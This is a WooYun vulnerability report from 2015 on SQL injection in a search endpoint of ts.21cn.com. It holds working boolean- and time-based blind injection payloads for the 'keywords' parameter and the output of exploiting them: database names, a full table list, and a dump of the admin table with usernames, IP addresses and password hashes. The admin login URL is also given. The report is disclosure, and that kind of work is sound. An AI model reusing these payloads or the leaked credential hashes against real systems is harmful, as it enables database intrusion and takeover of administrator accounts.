当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0112852

漏洞标题:世纪龙某站存在SQL注射漏洞

相关厂商:世纪龙信息网络有限责任公司

漏洞作者: 紫霞仙子

提交时间:2015-05-08 16:27

修复时间:2015-06-22 17:26

公开时间:2015-06-22 17:26

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2015-05-08: 细节已通知厂商并且等待厂商处理中
2015-05-08: 厂商已经确认,细节仅向厂商公开
2015-05-18: 细节向核心白帽子及相关领域专家公开
2015-05-28: 细节向普通白帽子公开
2015-06-07: 细节向实习白帽子公开
2015-06-22: 细节向公众公开

简要描述:

233

详细说明:

http://ts.21cn.com/Home/so (POST)
channelId=41&keywords=1&view=/article/article/search

漏洞证明:

---
Parameter: keywords (POST)
    Type: boolean-based blind
    Title: AND boolean-based blind - WHERE or HAVING clause
    Payload: channelId=41&keywords=1') AND 8761=8761 AND ('hILz' LIKE 'hILz&view=/article/article/search
    Type: AND/OR time-based blind
    Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
    Payload: channelId=41&keywords=1') AND (SELECT * FROM (SELECT(SLEEP(5)))AaoW) AND ('hnji' LIKE 'hnji&view=/article/article/search
---
web application technology: Nginx
back-end DBMS: MySQL 5.0.12
database management system users [1]:
[*] 'jtsuser'@'59.36.102.149'
available databases [2]:
[*] information_schema
[*] jutousu
Database: jutousu
+--------------------------------+---------+
| Table                          | Entries |
+--------------------------------+---------+
| iic_user                       | 73834   |
| iic_reply                      | 43953   |
| iic_digg                       | 41251   |
| iic_log                        | 32647   |
| iic_post_sync                  | 15150   |
| iic_user_addres                | 14712   |
| iic_digg_20131224              | 13041   |
| iic_post                       | 12630   |
| iic_post_com                   | 8575    |
| iic_reply_sync                 | 6180    |
| iic_area                       | 3407    |
| iic_collective_digg            | 1831    |
| iic_access                     | 917     |
| iic_com                        | 753     |
| iic_recom                      | 641     |
| iic_collective_reply           | 591     |
| iic_case                       | 586     |
| iic_merchant                   | 350     |
| iic_node                       | 271     |
| iic_captcha                    | 226     |
| iic_ipadmin                    | 96      |
| iic_feedback                   | 93      |
| iic_movice                     | 87      |
| iic_redblackdigg               | 73      |
| iic_collective                 | 70      |
| iic_postkeyword                | 66      |
| iic_cat                        | 61      |
| iic_reply_link                 | 60      |
| iic_collectivetimeline         | 59      |
| iic_hotpost                    | 42      |
| iic_role_account               | 39      |
| iic_team                       | 37      |
| iic_collectivenews             | 33      |
| iic_wxuser                     | 32      |
| iic_account                    | 30      |
| iic_specialcolumn              | 27      |
| iic_collectiveslide            | 26      |
| iic_proc                       | 24      |
| iic_redblacklist               | 24      |
| iic_article                    | 13      |
| iic_collectiveweibo            | 11      |
| iic_admin                      | 8       |
| iic_keyword                    | 7       |
| iic_role                       | 6       |
| iic_ip                         | 4       |
| iic_experttype                 | 3       |
| iic_post_dealwith_satisfaction | 3       |
| iic_arc                        | 2       |
| iic_wbsync                     | 2       |
| iic_filter                     | 1       |
+--------------------------------+---------+
Database: jutousu
Table: iic_admin
[8 entries]
+----+----------------+------+------------+------------+----------+------------------------------------------+
| id | ip             | rbac | ctime      | ltime      | username | password                                 |
+----+----------------+------+------------+------------+----------+------------------------------------------+
| 1  | 121.14.129.100 | 1    | 1357439115 | 1394700899 | root     | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 6  | 59.36.102.177  | 2    | 1363850273 | 1391559612 | xinan    | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
| 8  |                | 3    | 1363856328 | 1363856328 | sale     | cb486e69f7091c4b1d1f76fde175d69b08fe4745 |
| 9  |                | 3    | 1363911999 | 1363911999 | new      | bdb8465ce041d94a0e490564f2162dcc87d4a46a |
| 11 | 121.14.129.100 | 3    | 1381482461 | 1385456186 | caiy     | 7c4a8d09ca3762af61e59520943dc26494f8941b |
| 12 | 121.14.129.100 | 3    | 1387177000 | 1387330288 | test     | fb15a1bc444e13e2c58a0a502c74a54106b5a0dc |
| 14 | 121.14.129.100 | 3    | 1389577728 | 1389755015 | raoyw    | 291b673d8750ec66c8691735bcd6da57b3cb5041 |
| 15 | 116.22.48.206  | 2    | 1390894685 | 1391653182 | xinwen   | 79f5ace2973bd17ac2ea3bb43e9d84c2ab70d0de |
+----+----------------+------+------------+------------+----------+------------------------------------------+
后台地址:http://ts.21cn.com/admin/login

修复方案:

~~

版权声明:转载请注明来源 紫霞仙子@乌云

漏洞回应

厂商回应:

危害等级:高

漏洞Rank:15

确认时间:2015-05-08 17:26

厂商回复:

感谢您对我们业务安全的关注,根据您的报告,问题已着手处理。

最新状态:

暂无